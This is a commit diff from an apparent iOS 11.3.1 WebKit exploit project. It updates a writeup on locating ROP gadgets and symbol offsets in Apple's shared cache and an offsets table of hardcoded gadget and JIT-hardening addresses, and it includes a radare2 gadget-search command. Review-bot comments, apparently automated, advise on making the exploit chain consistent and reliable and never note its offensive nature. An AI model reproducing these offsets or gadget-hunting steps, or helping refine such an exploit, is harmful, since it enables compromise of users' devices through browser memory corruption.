improved writeup
MTJailed committed Jun 23, 2018
1 parent e1ec1a6 commit 92f3d1a
Showing 2 changed files with 10 additions and 15 deletions.
16 changes: 8 additions & 8 deletions DOCS/Webkit-11.3.1-Writeup.md
@@ -17,16 +17,16 @@ Therefore the following methods can be used for finding offsets for the exploit
The first option would be more straightforward as it only gives you the libraries you need but at this time my program as I wrote it is only able to dump the TEXT section from the libraries. You can find the code in UnjailMe.

The second option is what I did but that comes with a limitation:
- There are currently no working and precise cache extraction utillities that do not truncate or corrupt the libraries.
- Loading an entire cache (1GB) into IDA will be extremely slow
- Radare2 will load it but the analysis will take ages and its not efficient to analyze the entire cache
- Hopper will load it and you can select the library to analyze but hopper does not have very good ROP gadget search functionality other than poorly searching for opcodes.

So finding the symbol offsets is easy with hopper.
- ~~There are currently no working and precise cache extraction utillities that do not truncate or corrupt the libraries.~~
- Loading an entire cache (1GB) into IDA will be extremely slow so it needs to be extracted.
- Radare2 can be used to find the ROP gadgets
- My offset finder can find the offsets of the needed symbols on-device, otherwise hopper can be used.

Take a look at offsets.module.js and there you can see which offsets to find.

But then there are the ROP gadgets and those may take ages to find manually in Hopper.

Until either a new cache extraction utilty is written or my iOS app for dumping libraries is finished looking for ROP gadgets will be a painful job.
To find the popx8 gadget in ModelIO use the followin in radare2:
```radare2
"/c ldr x8, [sp, 0x28]; ldr x0, [x8, 0x18]; ldp x29, x30, [sp, 0x50]; add sp, sp, 0x60; ret"
```
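Review bot: the new lead sentence "So finding the symbol offsets is easy with hopper." is followed by a bullet list that still reads as the list of limitations it replaced: the first bullet is struck through instead of deleted, and the second now says the cache "needs to be extracted" while the struck-through line above it still says no non-corrupting extraction utility exists, so the section contradicts itself. Either drop the struck-through bullet and retitle the list as the workflow (extract the library, find symbol offsets with the offset finder or Hopper, find gadgets with radare2), or name the extraction utility that is now being relied on. Smaller points in the same hunk: "followin" should be "following"; the fence tag `radare2` is not a recognised language and will render as plain text; and the `/c` search prints the hit address within whatever file was opened, so state whether it is run against the extracted ModelIO or the whole cache and whether that address can be pasted directly into offsets.module.js as modelio_popx8 or must be rebased first.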

9 changes: 2 additions & 7 deletions modules/offsets.module.js
@@ -35,7 +35,7 @@ var Offsets = function Offsets(sw_vers, productname) {
jit_writeseperateheaps_func: 0x1b31a10c8, //From JSCore
usefastpermissions_jitcopy: 0x1b1bf0018, //From JSCore (JIT hardening)
ptr_stack_check_guard: 0x1ac2f7c40, //From JSCore
modelio_popx8: 0, //From ModelIO
modelio_popx8: 0x18d2f6574, //From ModelIO
// ldr x8, [sp, #0x28]
// ldr x0, [x8, #0x18]
// ldp x29, x30, [sp, #0x50]
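Review bot: the placeholder 0 for modelio_popx8 is replaced with a concrete address, but nothing in the hunk records which iOS build this gadget address belongs to, and the other entry for the same gadget further down this file uses 0x18d2f6564, 0x10 away. Since Offsets(sw_vers, productname) selects a per-build table, put the sw_vers/productname the value was taken from in the comment alongside "From ModelIO" so the two cannot be mixed up when more tables are added. Also, the old value 0 shows the file carries placeholders for unfound gadgets; it would be safer for the caller to refuse to run when any offset in the selected table is still 0 than to build a ROP chain around a null gadget.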
@@ -64,12 +64,7 @@ var Offsets = function Offsets(sw_vers, productname) {
jit_writeseperateheaps_func: 0x1b335d0c8, //From Webkit
usefastpermissions_jitcopy: 0x1b1d04018, //From Webkit (JIT hardening)
ptr_stack_check_guard: 0x1ac3efc40, //From Webkit
modelio_popx8: 0x18d2f6564, //From ModelIO
// ldr x8, [sp, #0x28]
// ldr x0, [x8, #0x18]
// ldp x29, x30, [sp, #0x50]
// add sp, sp, #0x60
// ret
modelio_popx8: 0x18d2f6564, //Use radare: "/c ldr x8, [sp, 0x28]; ldr x0, [x8, 0x18]; ldp x29, x30, [sp, 0x50]; add sp, sp, 0x60; ret"
coreaudio_popx2: 0x18409ddbc, //From CoreAudio
// ldr x2, [sp, #8]
// mov x0, x2
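Review bot: this hunk deletes the five-line disassembly comment for modelio_popx8 and replaces it with the radare2 search string, while the matching entry in the @@ -35 hunk above and the coreaudio_popx2 entry right below keep the disassembly form; keep all entries in the same form. The disassembly is the more useful of the two for a reader verifying the gadget, and the radare2 command already lives in DOCS/Webkit-11.3.1-Writeup.md, so duplicating it here just creates a second copy to keep in sync. Note that the address 0x18d2f6564 itself is unchanged by this hunk, so the only effect is the comment change.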
